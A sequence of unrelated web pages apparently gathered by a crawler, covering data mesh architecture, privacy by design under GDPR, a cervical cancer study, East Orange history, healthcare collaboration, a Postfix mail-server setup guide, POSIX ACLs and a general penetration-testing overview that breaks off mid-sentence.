A data mesh is an architecture for implementing the democratization of data across a business. Unlike centralized data warehouses, a data mesh federates data and delegates data ownership to the specialist business domains, who publish their data as a service for all business functions to consume it. The result is a more agile data architecture that allows individual business units some autonomy to manage their core data assets. Why Use a Data Mesh Architecture? The primary idea behind mesh architectures is to enable a more flexible and scalable data architecture. Monolithic, centralized enterprise data warehouses can be cumbersome to implement, inflexible and expensive to change. By devolving the curation and administration of domain-specific data sets to the business functions that know them best, the business can better adapt to changing business conditions. One of the primary reasons why the data mesh model scales is because it avoids overburdening centralized data teams. This is accomplished by propagating standard best practices across business domains. Skills shortages are a common cause of big data and data lake projects stagnating into data swamps. Skills gained by staff in one business domain are easily transferred to other domains, reducing training times and allowing projects to be delivered faster. Maintaining Interoperability Between Pools of Data A core component of a data mesh is the built-in universal interoperability bus that all the domain-specific data warehouses or data marts plug into. This avoids the problems of traditional siloed data marts that often use duplicate, out-of-sync data, and ad hoc tools. Curated data held by one department is available to related business units. Each departmental data warehouse publishes its data-as-a-product to the interoperability bus. How is a Data Mesh Different to Data Fabric? A data mesh is composed of an interconnected set of domain-specific data product services with ownership responsibilities delegated to the various domains in a business. A data fabric creates a single virtual centralized system without distributed data ownership. Key Elements of a Data Mesh The main components of a data mesh are: - Data sources. - Data infrastructure. - Domain-specific data-as-a-service. - Shared standardized governance, data quality and metadata conventions. Data Ownership and Responsibilities Each domain data owner agrees with its peers’ data quality and availability service levels. Every domain uses centralized standards for data pipelines. The data mesh provides standardized storage and streaming infrastructure. ETL pipelines can be domain specific but need to use standard metadata labels, data formats, cataloging, lineage, and data governance conventions to ease interoperability and promote compliance. Some of the many benefits of data mesh architectures include the following: - Faster time to value for data-oriented projects. - Lines of business can respond quickly to competitive, regulatory and market pressures or opportunities to explore new markets. - Shared tools, standards, and processes benefit the whole business by increasing efficiency by reducing duplicated efforts. - Avoids central resource bottlenecks by delegating data responsibilities to specialist business domains that best understand their data needs. - More modular data services are easier to understand and use. As with microservices, refactoring monolithic applications into smaller, more digestible components makes them easier to share and consume. - Consistent application of data quality and data governance requirements across a business improves cooperation and eases future data integration efforts. - Data and process transparency in the mesh eliminate departmental pools of unconnected siloed data. - Businesses get more value from their data because federating it across the organization enables better data-driven decision-making. What Are the Characteristics of a Successful Data Product? The most significant success factor for a data product is adoption. The characteristics that drive adoption include discoverability, reliability, trustworthiness, security, and data quality. Because a data mesh is essentially a self-service model, published data needs to be easy to find, well-documented and easy to consume. Consumers can provide feedback to domain owners on the quality and utility of a data product to ensure shortcomings are addressed and to enable continuous refinement. Data Mesh Management Data products and pipelines need to be supervised at the domain and infrastructure levels to ensure high availability levels and address failures. Monitoring and observability capabilities are therefore design-in to make the life of developers and infrastructure teams easier. Data products should be protected by encrypting data at rest and in motion. Versioning of data services enables the rollback of bad deployments. Actian Supports Data Marts The Actian Data Platform can support multiple data marts and warehouses hosted on-premises or on multiple cloud platforms. Actian has built-in connectors to hundreds of prebuilt connector sources, including NetSuite, Salesforce and ServiceNow. The Actian Data Platform uses a vectorized columnar database that outperforms alternatives by 7.9x and is ideal for staging data before being published as a data product within a domain. The Three Components of a Data Product including data pipelines, policies and application interfaces. Data and Metadata can include tables, views, graphs, and associated metadata. includes scripts to build and instantiate a data product service.
<urn:uuid:1264bbad-b843-42ae-ad7f-9c7a2cb88a8d>
CC-MAIN-2024-38
https://www.actian.com/data-mesh/
2024-09-10T02:02:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00696.warc.gz
en
0.906803
1,063
3.109375
3
The proliferation of social networking and collaboration tools has ushered in a new era of the remote enterprise workforce; however, they have also made organizational boundaries non-static. Making it increasingly difficult to safeguard the confidential and personal data of their business partners, employees and customers. In theses political uncertain times, defending privacy is paramount to […] The proliferation of social networking and collaboration tools has ushered in a new era of the remote enterprise workforce; however, they have also made organizational boundaries non-static. Making it increasingly difficult to safeguard the confidential and personal data of their business partners, employees and customers. In theses political uncertain times, defending privacy is paramount to the success of every enterprise. The threats and risks to data are no longer theoretical; they are apparent and menacing. Tech decision makers have to step in-front of the problem and respond to the challenge. Adopting the privacy by design framework is a surefire way of protecting all users from attacks on their privacy and safety. The bedrock of privacy be design (PbD) is the anticipation, management and prevention of privacy issues during the entire life cycle of the process or system. According to the PbD philosophy, the most ideal way to mitigate privacy risks is not creating them to begin with. Its architect, Dr. Ann Cavoukian, contrived the framework to deal with the rampant issue of developers applying privacy fixes after the completion of a project. The privacy by design framework has been around since the 1990s, but it is yet to become mainstream. That will soon change. The EU’s data protection overhaul, GDPR which comes into effect in May 2018, demands privacy by design as well as data protection by default across all applications and uses. This means that any organization that serves EU residents has to adhere to the newly set data protection standards regardless of whether they themselves are located within the European Union. GDPR has made a risk-based approach to pinpointing digital vulnerabilities and eliminating privacy gaps a requirement. Article 25 of the General Data Protection Regulation systematizes both the concepts of privacy by design and privacy be default. Under the ‘privacy by design’ requirement, organizations will have to setup compliant procedures and policies as fundamental components in the maintenance and design of information systems and mode of operation for every organization. This basically means that privacy by design measures may be inclusive of pseudonymization or other technologies that are capable of enhancing privacy. Article 25 states that a data controller has to implement suitable organizational and technical measures at the time a mode of processing is determined and at the time the data is actually processed, in order to guarantee data protection principles like data minimization are met. Simply put, Privacy by Default denotes that strict privacy settings should be applied by default the moment a service is released to the public, without requiring any manual input from the user. Additionally, any personal data provided by the user to facilitate the optimal use of a product must only be kept for the amount of time needed to offer said service of product. The example commonly given is the creation of a social media profile, the default settings should be the most privacy-friendly. Details such as name and email address would be considered essential information but not location or age or location, also all profiles should be set to private by default. Privacy Impact Assessments are an intrinsic part of the privacy by design approach. A PIA highlights what personally Identifiable Information is collected and further explains how that data is maintained, how it will be shared and how it will be protected. Organizations should conduct a PIA to assess legislative authority and pinpoint and extenuate privacy risks before sharing any personal information. Not only will the PIA aid in the design of more efficient and effective processes for handling personal data, but it can also reduce the associated costs and damage to reputation that could potentially accompany a breach of data protection regulations and laws. The most ideal time to complete a Privacy Impact Assessment is at the design stage of a new process or system, and then re-visit it as legal obligations and program requirements change. Under Article 35 of the GDPR, data protection impact assessments (DPIA) are inescapable for companies with processes and technologies that will likely result in a high risk to the privacy rights of end-users. The main objective of privacy by design are to ensure privacy and control over personal data. Organization can gain a competitive advantage by practicing the seven foundational principles. These principles of privacy by design can be applied to all the varying types of personal data. The zeal of the privacy measures typically corresponds to the sensitivity of the data. I. Proactive not Reactive; Preventative not Remedial – Be prepared for, pinpoint, and avert privacy issues before they occur. Privacy risks should never materialize on your watch, get ahead of invasive events before the fact, not afterward. II. Privacy as the default setting – The end user should never take any additional action to secure their privacy. Personal data is automatically protected in all business practices or IT systems right off the bat. III. Privacy embedded into design – Privacy is not an after thought, it should instead be part and parcel of the design as a core function of the process or system. IV. Full functionality (positive-sum, not zero sum) – PbD eliminates the need to make trade-offs, and instead seeks to meet the needs of all legitimate objectives and interests in a positive-sum manner; circumventing all dichotomies. V. End-to-end lifestyle protection – An adequate data minimization, retention and deletion process should be fully-integrated into the process or system before any personal data is collected. VI. Transparency and visibility – Regardless of the technology or business practice involved, the set privacy standards have to be visible, transparent and open to providers and users alike; it should also be documented and independently verifiable. VII. Keep it user-centric – Respect the privacy of your users/customers by offering granular privacy options, solid privacy defaults, timely and detailed information notices, and empowering user-friendly options. The General Data Protection Regulation makes privacy by design and privacy by default legal requirements in the European Union. So if you do business in the EU or process any personal data belonging to EU residents you will have to implement internal processes and procedures to address the set privacy requirements. A vast majority of organizations already prioritize security as part of their processes. However, becoming fully compliant with the privacy by design and privacy by default requirement may demand additional steps. This will mean implementing a privacy impact assessment template that can be populated every time a new system is procured, implemented or designed. Organizations should also revisit their data collection forms to make sure that only essential data is being collected. Lastly it will be prudent to set up automated deletion processes for specific data, implementing technical measures to guarantee that personal data is flagged for deletion after it is no longer required. FileCloud checks all the boxes when it comes to the seven principles of privacy by design and offers granular features that will set you on the path to full GDPR compliance. Click here for more information. Author Gabriel Lando
<urn:uuid:2e4d4005-cf94-41db-8293-da15d6ed8672>
CC-MAIN-2024-38
https://www.filecloud.com/blog/2018/04/designing-privacy-to-meet-gdpr-compliance/
2024-09-13T19:21:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00396.warc.gz
en
0.934278
1,444
2.578125
3
This occurrence is not just being witnessed in California or United States alone but also globally as well. Among the many reasons contributing to this occurrence is the current screening and follow up guidelines. The study findings were published in the peer reviewed journal: Cancer Epidemiology, Biomarkers & Prevention. A new study conducted by UC Davis Comprehensive Cancer Center researchers shows an alarming number of California women 65 and older are facing late-stage cervical cancer diagnoses and dying from the disease. This is despite guidelines that recommend most women stop screening for cervical cancer at this age. “Our findings highlight the need to better understand how current screening guidelines might be failing women 65 and over,” the study’s lead author, UC Davis senior statistician Julianne Cooley, said. “We need to focus on determining the past screening history of older women as well as lapses in follow-up care. We must utilize non-invasive testing approaches for women nearing age 65 or those who need to catch up on their cervical cancer screenings.” The findings from the study, published in Cancer Epidemiology, Biomarkers & Prevention on January 9, 2023, showed nearly one in five new cervical cancers diagnosed from 2009-2018 were in women 65 and older. More of these women (71%) presented with late-stage disease than younger women (48%), with the number of late-stage diagnoses increasing up to age 79. Late-stage five-year relative survival was lower for women 65 and over (23.2%-36.8%) compared to patients under 65 (41.5%-51.5%). Women 80 years and older had the lowest survival of all age groups. “Our study found worsening five-year relative survival from cervical cancer with each increasing age category for both early and late-stage diagnoses,” said co-author Theresa Keegan, a professor in the UC Davis Division of Hematology and Oncology. California Cancer Registry provided critical data The study utilized a large set of population-based data from the California Cancer Registry. This state-mandated cancer surveillance system has collected cancer incidence and patient demographic, diagnostic, and treatment information since 1988. The data was used to identify all women 21 years and older who were diagnosed with a first primary cervical cancer in California from 2009-2018, the 10 most recent years that complete data was available. Among women 65 and older, those who had comorbidities or were older were more likely to be diagnosed with late-stage disease. “Interestingly, prior studies of younger women have found increased late-stage cervical cancer diagnoses among young Hispanic/Latina and Black women,” Cooley said. “Our study did not observe these associations and instead found that older Hispanic/Latina women were less likely than non-Hispanic white women to be diagnosed late-stage.” Current screening guidelines Following the introduction and widespread adoption of the Papanicolaou (Pap) smear test in the 1940s, cervical cancer incidence and mortality have fallen significantly. However, incidence rates have plateaued since 2012, and rates of invasive cervical cancer have actually increased in recent decades. Through adequate screening and follow-up, cervical cancer can be prevented or detected at an early stage, which leads to excellent survival. However, current guidelines recommend discontinuing screening for women 65 or older who have had a history of normal Pap and/or Human Papillomavirus (HPV) tests, potentially leaving this age group vulnerable. Lack of adherence to screening Previous studies have shown that 23.2% of women in the U.S. who are over 18 are not up to date on recommended cervical cancer screening. Disadvantaged women such as those who are uninsured or poor are the least likely to report being up to date with cervical cancer screening. “Scheduled screenings may also decrease as women approach 65, increasing the likelihood that women have not been adequately screened prior to the upper age cutoff,” co-author and senior epidemiologist Frances Maguire said. Additional factors may contribute to older women not receiving adequate screening: - Specific type of hysterectomy. A supracervical hysterectomy leaves the cervix intact and some women do not realize they need to continue screening for cervical cancer. - Discomfort. Women may tire of PAP smears due to embarrassment and the intrusiveness of a speculum-based exam. - Pap tests less accurate. The screening may not be as accurate in post-menopausal women in detecting adenocarcinoma, which has been increasing in incidence (as compared to squamous cell carcinoma). - HPV testing. Women in the older age group may not have received HPV testing, now the gold standard of cervical cancer screening, which wasn’t widely available until 2003. The Centers for Disease Control reports that almost all cases of cervical cancer are HPV-related.
<urn:uuid:30180ccf-ac83-409d-876a-d627ecfa5cc3>
CC-MAIN-2024-38
https://debuglies.com/2023/01/10/more-women-aged-65-and-above-are-dying-from-cervical-cancer/
2024-09-17T11:12:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00096.warc.gz
en
0.961164
1,016
2.515625
3
East Orange, New Jersey The regions of East Orange can be traced back to a colony in New Haven, Connecticut. About 30 families from New Haven came by water in 1666 to develop a town situated on the Passaic River. The territory this group arrived on currently encompasses several municipalities, including Newark and the Oranges. That area was on a land grant’s northeast portion, conveyed by England’s King Charles II to the Duke of York (James, his brother). James later conveyed the land to a couple of proprietors – Sir George Carteret and Lord John Berkley. Carteret was the Isle of Jersey’s Royal Governor, and that territory became what we know today as – you guessed it – “New Jersey.” Initially, East Orange had been part of New York, and was originally called “Newark Mountains.” In the summer of 1780, though, Newark Mountains’ townspeople voted to change the name to just “Orange.” During that time, many people favored secession from the city of Newark. This transpired in 1806, as the territory that encompassed the Oranges became detached. In the spring of 1807, a government had been elected for the first time, but Orange wasn’t incorporated officially as their city until March 1860. Once that happened, the city started fragmenting into many smaller communities, mostly because local disputes ensued due to costs involved with establishing fire, street, and police departments. In early 1861, South Orange became organized. In 1862, Fairmount came into existence (eventually becoming an aspect of West Orange). In 1863, East Orange came about. Finally, West Orange debuted in 1863 (though it included Fairmount). East Orange became reincorporated as its own city in 1899 as per referendum results held a couple of days prior. Based on statistics from the US Census Bureau, East Orange had 10.17 km² (3.93 mi.²) of the total area, which was all land. Geographically speaking, East Orange had shared borders with Newark’s Essex County municipalities to the South and East, South Orange toward the Southwest, Bloomfield and Glenridge toward the North, and Orange toward the West. A couple of unincorporated localities, place names, and communities located completely or partially inside the city are Brick Church and Ampere. Map Of East Orange, NJ The mansion of Ambrose–Ward represents the wealth East Orange used to be renowned for. It was built for a manufacturer of books in 1898. It is currently where New Jersey’s African-American fund is situated. East Orange happens to be divided up into five different wards. It’s also divided into several different neighborhoods unofficially, most of which have homes and streets that are well maintained. - Ampere: a train station that is now defunct anchors Ampere. It was developed directly on land that was owned by a company called Orange Waterworks. It came about after a plant owned by the Crocker Wheeler company was constructed. This company spurred development within the area. André-Marie Ampère was who the station happened to be named after. This individual was an electrodynamics pioneer. The station was reconstructed in 1907 as the Renaissance Revival Station. Its boundaries include Bloomfield (North), New York and Lawton Street (East), North Grove St. (West), and 4th Avenue (South). - Teen Streets (Greenwood): “teen” streets running through Greenwood Avenue are often grouped in with Ampere. The area was disturbed severely when Interstate 280 was constructed and when the Garden State Parkway came into existence. The old DL&W Railroad’s Grove Street station was situated at Main and Grove streets. It bounded the North by Fourth Avenue, towards the East by North 15th St., North Grove St. towards the West, and Essex Lines and New Jersey transit Morris/Eaton Place. - Presidential Estates: this is a recent designation – streets within the area are named after the original United States presidents. Many large homes are well maintained situated on the streets. They are lined with significantly old but big shade trees all over the neighborhood, which are characteristics of the city’s northern section. It is bounded roughly by Bloomfield toward the North, North Grove St. and the Montclair-Boonton Line toward the East, Garden State Parkway toward the West, and Springdale Avenue toward the South. - Elmwood: situated in the city’s southeastern area, Elmwood Park has seven different tennis courts along Rhode Island Ave., one swimming pool containing a pool house, one baseball field, one softball field, one walking track, a restored fieldhouse on Oak Street, and a basketball court situated on Oak Street/Elmwood Avenue. The area houses one of the last Carnegie Libraries, which opened up in 1912 (the Elmwood branch of East Orange Public Library). - Franklin (Doddtown): John Dodd surveyed and founded the Watsessing Plain area. Upsala College’s former campus is situated here. It eventually was reconstructed into the East Orange Campus High School on Prospect Street’s East side, which contains an adjacent subdivision for new housing. It is bounded roughly by Bloomfield toward the North, Park Avenue toward the South, Orange toward the West, and Garden State Parkway toward the East. Here’s how to get to our office from the East Orange Public Library: HotHeadTech.com is the best NJ Computer Support service out there.
<urn:uuid:17cb62e4-0cd8-4da1-b2a3-2900897a886c>
CC-MAIN-2024-38
https://www.hotheadtech.com/east-orange-nj/
2024-09-17T11:25:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00096.warc.gz
en
0.976316
1,139
3.296875
3
Master Data Management How the New Normal ushers in global healthcare collaboration Many questions remain unanswered about the New Normal scenario post the pandemic situation. Numbers are thrown about and theories abound. The pandemic has caused cataclysmic changes in our world and a tumultuous upheaval across industries. Global healthcare, of course, has been the focus over the last couple of years. While significant advances were expected in healthcare, no one could have predicted the rapid transformation of the industry. Globally, the response of the healthcare industry has been rapid and collaborative. Quick changes to policies and procedures, faster adoptions of medicines and treatment, with timelines moving from years to weeks and even days, quick turnarounds in research and development, sidestepping administrative red tape and bringing innovative solutions to market quickly - all of these have been brought about to meet a common agenda, which is to help communities and save lives. Undoubtedly, the healthcare industry has demonstrated resilience and agility, focusing on simple solutions to complex problems, with an extraordinary pace of innovation. The pandemic has accelerated development in both medicine and technology, and triggered reinvention across many sectors in healthcare. Why is collaboration important? The world has encountered pandemics and widespread infectious diseases earlier, which have demonstrated that nations only stand to benefit from collaborative efforts to stop the spread of disease. COVID-19 has shown how interdependent the world is. Nation-wide lockdowns and closing of borders have had a far-reaching impact on the physical, mental, and economic well-being of populations. International collaboration in healthcare becomes of paramount importance. This is because: - Nations are closely connected, resulting in rapid spread diseases, bringing the realisation that every disease needs to be eradicated across the globe and not just in one country. This is evidenced by the fact that the SARS COV-2 virus continues to mutate, and its variants are still spreading across the globe. - Organisations across the world now know that sharing of both knowledge and experience is beneficial to achieve faster learning and progress. A common pool of resources helps in prevention and treatment. Such sharing especially helps countries that lack surveillance infrastructure. - Creating world-wide standards helps put in place a framework for comparing information and best practises, as well as building mutual understanding and trust. In the healthcare industry, companies have realised that it is not possible to do it all alone. Global partnerships to facilitate both medicine and vaccine development and distribution are on the rise, while simultaneously providing solutions for faster and efficient patient care, as well as equipment and guidance for healthcare workers. Digital transformation accelerates healthcare International cooperation and collaboration assume supreme importance when dealing with any disease. While the pandemic resulted in millions of deaths, it is firmly believed that vaccinations have reduced the severity of the disease and mortality too. Global vaccinations have crossed 10.3 billion across 184 countries. A slew of worldwide initiatives started at the beginning of the pandemic, many of which have helped countries handle grave healthcare emergencies. The World Health Organisation (WHO) launched global funding efforts, standardised vaccine approvals and launched the Access to COVID-19 Tools (ACT) Accelerator, which is a global collaboration to fast-track development of diagnostic tests, treatment, and vaccines. The global research community has collaborated across disciplines - academic, industry, research, and professional groups. There has been exchange of data and information on laboratory and surveillance, genome sequencing, and clinical outcomes. Technology has played a major role in pandemic response and management and knowledge sharing. Healthcare has undergone a robust digital revolution during COVID-19. Information and data exchange platforms are vital to control the spread of any epidemic disease. Public-Private-Partnerships (PPP) and telemedicine have emerged as gamechangers. Cloud-based systems facilitate easy sharing of data and information across the globe. AI and ML help mine big data to help understand trends and predict future outbreaks. Some of the areas where technology has proven to be indispensable include: - Bioinformatics systems for drug discovery and genome sequencing - Decision Support Systems for triaging, risk assessment and managing healthcare supply chains - Robotics to aid health workers - Online interactive dashboards - IoT for real-time monitoring and tracking by use of sensors and surveillance systems. Data intelligence and data analytics platforms are going to be imperative for future pandemics, with regard to predictions and response, as well as management. While the global healthcare industry underwent an abrupt digital transformation due to COVID-19, the future is here, now. Digital platforms built on robust technology are going to be essential to the healthcare industry to provide agile, flexible, sentient, collaborative, and predictive solutions in a dynamically changing environment.* The pandemic has brought about the awareness that global collaboration across multiple disciplines is required for a safer world. * For organizations on the digital transformation journey, agility is key in responding to a rapidly changing technology and business landscape. Now more than ever, it is crucial to deliver and exceed on organizational expectations with a robust digital mindset backed by innovation. Enabling businesses to sense, learn, respond, and evolve like a living organism, will be imperative for business excellence going forward. A comprehensive, yet modular suite of services is doing exactly that. Equipping organisations with intuitive decision-making automatically at scale, actionable insights based on real-time solutions, anytime/anywhere experience, and in-depth data visibility across functions leading to hyper-productivity, Live Enterprise is building connected organizations that are innovating collaboratively for the future.
<urn:uuid:13be9568-94f0-452e-a5aa-8e8cf8da2d2d>
CC-MAIN-2024-38
https://www.infosysbpm.com/blogs/master-data-management/how-the-new-normal-ushers-in-global-healthcare-collaboration.html
2024-09-17T13:21:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00096.warc.gz
en
0.946547
1,130
2.609375
3
How to install and configure Postfix on Ubuntu 16.04 Postfix is a popular open-source Mail Transfer Agent (MTA) that can be used to route and deliver email on a Linux system. It is estimated that around 25% of public mail servers on the internet run Postfix. In this guide, we'll teach you how to get up and running quickly with Postfix on an Ubuntu 16.04 server. In order to properly configure Postfix, you will need a Fully Qualified Domain Name pointed at your Ubuntu 16.04 server. If you plan on accepting mail, you will need to make sure you have an MX record pointing to your mail server as well. For the purposes of this tutorial, we will assume that you are configuring a host that has the FQDN of mail.example.com. Step 1: Install Postfix Postfix is included in Ubuntu's default repositories, so installation is incredibly simple. To begin, update your local apt package cache and then install the software. We will be passing in the DEBIAN_PRIORITY=low environmental variable into our installation command in order to answer some additional prompts: sudo apt-get update sudo DEBIAN_PRIORITY=low apt-get install postfix Use the following information to fill in your prompts correctly for your environment: - General type of mail configuration?: For this, we will choose Internet Site since this matches our infrastructure needs. - System mail name: This is the base domain used to construct a valid email address when only the account portion of the address is given. For instance, the hostname of our server is example.com, but we probably want to set the system mail name to example.com so that given the username user1, Postfix will use the address firstname.lastname@example.org. - Root and postmaster mail recipient: This is the Linux account that will be forwarded mail addressed to root@ and postmaster@. Use your primary account for this. In our case, sammy. - Other destinations to accept mail for: This defines the mail destinations that this Postfix instance will accept. If you need to add any other domains that this server will be responsible for receiving, add those here, otherwise, the default should work fine. - Force synchronous updates on mail queue?: Since you are likely using a journaled filesystem, accept No - Local networks: This is a list of the networks that your mail server is configured to relay messages for. The default should work for most scenarios. If you choose to modify it, make sure to be very restrictive in regards to the network range. - Mailbox size limit: This can be used to limit the size of messages. Setting it to "0" disables any size restriction. - Local address extension character: This is the character that can be used to separate the regular portion of the address from an extension (used to create dynamic aliases). - Internet protocols to use: Choose whether to restrict the IP version that Postfix supports. We'll pick "all" for our purposes. To be explicit, these are the settings we'll use for this guide: - General type of mail configuration?: Internet Site - System mail name: example.com (not mail.example.com) - Root and postmaster mail recipient: sammy - Other destinations to accept mail for: $myhostname, example.com, mail.example.com, localhost.example.com, localhost - Force synchronous updates on mail queue?: No - Local networks: 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 - Mailbox size limit: 0 - Local address extension character: + - Internet protocols to use: all If you need to ever return to re-adjust these settings, you can do so by typing: sudo dpkg-reconfigure postfix The prompts will be pre-populated with your previous responses. When you are finished, we can now do a bit more configuration to set up our system how we'd like it. Step 2: Tweak the Postfix Configuration Next, we can adjust some settings that the package did not prompt us for. To begin, we can set the mailbox. We will use the Maildir format, which separates messages into individual files that are then moved between directories based on user action. The other option is the mbox format (which we won't cover here) which stores all messages within a single file. We will set the home_mailbox variable to Maildir/ which will create a directory structure under that name within the user's home directory. The postconf command can be used to query or set configuration settings. Configure home_mailbox by typing: sudo postconf -e 'home_mailbox= Maildir/' Next, we can set the location of the virtual_alias_maps table. This table maps arbitrary email accounts to Linux system accounts. We will create this table at /etc/postfix/virtual. Again, we can use the postconf command: sudo postconf -e 'virtual_alias_maps= hash:/etc/postfix/virtual' Step 3: Map Mail Addresses to Linux Accounts Next, we can set up the virtual maps file. Open the file in your text editor: sudo nano /etc/postfix/virtual The virtual alias map table uses a very simple format. On the left, you can list any addresses that you wish to accept email for. Afterwards, separated by whitespace, enter the Linux user you'd like that mail delivered to. For example, if you would like to accept email at email@example.com and firstname.lastname@example.org and would like to have those emails delivered to the sammy Linux user, you could set up your file like this: After you've mapped all of the addresses to the appropriate server accounts, save and close the file. We can apply the mapping by typing: sudo postmap /etc/postfix/virtual Restart the Postfix process to be sure that all of our changes have been applied: sudo systemctl restart postfix Step 4: Adjust the Firewall If you are running the UFW firewall, as configured in the initial server setup guide, we'll have to allow an exception for Postfix. You can allow connections to the service by typing: sudo ufw allow Postfix The Postfix server component is installed and ready. Next, we will set up a client that can handle the mail that Postfix will process. Step 5: Setting up the Environment to Match the Mail Location Before we install a client, we should make sure our MAIL environmental variable is set correctly. The client will inspect this variable to figure out where to look for user's mail. In order for the variable to be set regardless of how you access your account (through ssh, su, su -, sudo, etc.) we need to set the variable in a few different locations. We'll add it to /etc/bash.bashrc and a file within /etc/profile.d to make sure each user has this configured. To add the variable to these files, type: echo 'export MAIL=~/Maildir' | sudo tee -a /etc/bash.bashrc | sudo tee -a /etc/profile.d/mail.sh To read the variable into your current session, you can source the /etc/profile.d/mail.sh file: Step 6: Install and Configure the Mail Client In order to interact with the mail being delivered, we will install the s-nail package. This is a variant of the BSD xmail client, which is feature-rich, can handle the Maildir format correctly, and is mostly backwards compatible. The GNU version of mail has some frustrating limitations, such as always saving read mail to the mbox format regardless of the source format. To install the s-nail package, type: sudo apt-get install s-nail We should adjust a few settings. Open the /etc/s-nail.rc file in your editor: sudo nano /etc/s-nail.rc Towards the bottom of the file, add the following options: . . . This will allow the client to open even with an empty inbox. It will also set the Maildir directory to the internal folder variable and then use this to create a sent mbox file within that, for storing sent mail. Save and close the file when you are finished. Step 7: Initialize the Maildir and Test the Client Now, we can test the client out. Initializing the Directory Structure The easiest way to create the Maildir structure within our home directory is to send ourselves an email. We can do this with the mail command. Because the sent file will only be available once the Maildir is created, we should disable writing to that for our initial email. We can do this by passing the -Snorecord option. Send the email by piping a string to the mail command. Adjust the command to mark your Linux user as the recipient: echo 'init' | mail -s 'init' -Snorecord sammy You should get the following response: Can't canonicalize "/home/sammy/Maildir" This is normal and will only show during this first message. We can check to make sure the directory was created by looking for our ~/Maildir directory: ls -R ~/Maildir You should see the directory structure has been created and that a new message file is in the ~/Maildir/new directory: cur new tmp It looks like our mail has been delivered. Managing Mail with the Client Use the client to check your mail: You should see your new message waiting: s-nail version v14.8.6. Type ? for help. "/home/sammy/Maildir": 1 message 1 new >N 1 email@example.com Wed Dec 31 19:00 14/369 init Just hitting ENTER should display your message: [-- Message 1 -- 14 lines, 369 bytes --]: From firstname.lastname@example.org Wed Dec 31 19:00:00 1969 Date: Fri, 13 May 2016 18:07:49 -0400 You can get back to your message list by typing h: s-nail version v14.8.6. Type ? for help. "/home/sammy/Maildir": 1 message 1 new >R 1 email@example.com Wed Dec 31 19:00 14/369 init Since this message isn't very useful, we can delete it with d: Quit to get back to the terminal by typing q: Sending Mail with the Client You can test sending mail by typing a message in a text editor: Inside, enter some text you'd like to email: This is a test. Please confirm receipt! Using the cat command, we can pipe the message to the mail process. This will send the message as your Linux user by default. You can adjust the "From" field with the -r flag if you want to modify that value to something else: cat ~/test_message | mail -s 'Test email subject line' -r from_field_account firstname.lastname@example.org The options above are: - -s: The subject line of the email - -r: An optional change to the "From:" field of the email. By default, the Linux user you are logged in as will be used to populate this field. The -r option allows you to override this. - email@example.com: The account to send the email to. Change this to be a valid account you have access to. You can view your sent messages within your mail client. Start the interactive client again by typing: Afterwards, view your sent messages by typing: You can manage sent mail using the same commands you use for incoming mail. You should now have Postfix configured on your Ubuntu 16.04 server. Managing email servers can be a tough task for beginning administrators, but with this configuration, you should have basic MTA email functionality to get you started.
<urn:uuid:ae48f9b4-8306-404c-9f9a-e3bb03ef001e>
CC-MAIN-2024-38
https://support.hostway.com/hc/en-us/articles/360000310410-How-to-install-and-configure-Postfix-on-Ubuntu-16-04
2024-09-18T14:56:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00896.warc.gz
en
0.841819
2,611
2.65625
3
Data Management Glossary POSIX ACLs are fine-grained access rights for files and directories. An Access Control Lists (ACL) consists of entries specifying access permissions on an associated object. POSIX ACLs provides more granular control over file and directory permissions than the traditional POSIX permission model. The traditional POSIX permission model uses a set of file bits to define permissions for the owner, group, and other users. In contrast, POSIX ACLs provide a more flexible and fine-grained access control mechanism by allowing multiple entries in an access control list, each of which specifies a different user or group and a different set of permissions. With POSIX ACLs, you can grant or deny specific permissions to individual users or groups for a particular file or directory. For example, you can allow a particular user to read and write a file, but deny them the ability to execute it. You can also grant a group of users read-only access to a directory, but prevent them from modifying or deleting any files in that directory. POSIX ACLs are supported on many Unix-based operating systems, including Linux, BSD, and macOS. They can be managed using command-line utilities such as setfacl and getfacl. Not all filesystems support POSIX ACLs. Their behavior may vary across different implementations.
<urn:uuid:be1b449d-3e33-49c3-8bfd-9831c09c7080>
CC-MAIN-2024-38
https://www.komprise.com/glossary_terms/posix-acls/
2024-09-19T20:22:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00796.warc.gz
en
0.889193
275
3.171875
3
Pen testing is a security exercise in which a cyber-security specialist seeks to discover and exploit flaws in a computer system. This simulated attack aims to find any weak points in a system's security that attackers may exploit. This is analogous to a bank paying someone to disguise themselves as burglars to get into their building and access the vault. If the 'burglar' succeeds in breaking into the bank or burial, the bank will receive vital information about how to strengthen security systems. Ethical hacking techniques, which imitate a cyberattack, assist security experts in evaluating the efficiency of information security safeguards within their businesses. The pen test seeks to breach an organization's cyber defenses by looking for exploitable flaws in networks, online apps, and user security. The goal is to identify system flaws before attackers do. In the case of networks, the overarching purpose is to improve security by shutting unused ports, debugging services, adjusting firewall rules, and closing any security gaps. Appknox's Pen testing tool is used to find, evaluate, and report on common online application vulnerabilities such as buffer overflow, SQL injection, and cross-site scripting, to mention a few. Pen testing can also acquire privileged access to sensitive systems or steal data from a secure system. Penetration testing is frequently used to supplement a web application firewall in the context of web application security (WAF). Common Pen Testing Methods Here are some regularly used penetration testing methodologies based on the organized organization. Entails assaults on the company's network perimeter utilizing processes outside the organization's systems, such as the Extranet and Internet. Performed from within the organisation's environment, this test seeks to determine what would happen if the network perimeter is successfully breached or what an authorised user might do to access certain information resources within the organisation. The testing team has little or no knowledge of the business. It must rely on publicly accessible information (such as the corporate website, domain name registration, and so on) to acquire information about the target and execute penetration tests. Only a few people inside the organisation are made aware of the testing throughout this exercise. Because the IT and security personnel are not told or informed in advance, they are "blind" to the intended testing operations. Helps organizations assess their security monitoring and incident detection processes and their escalation and response 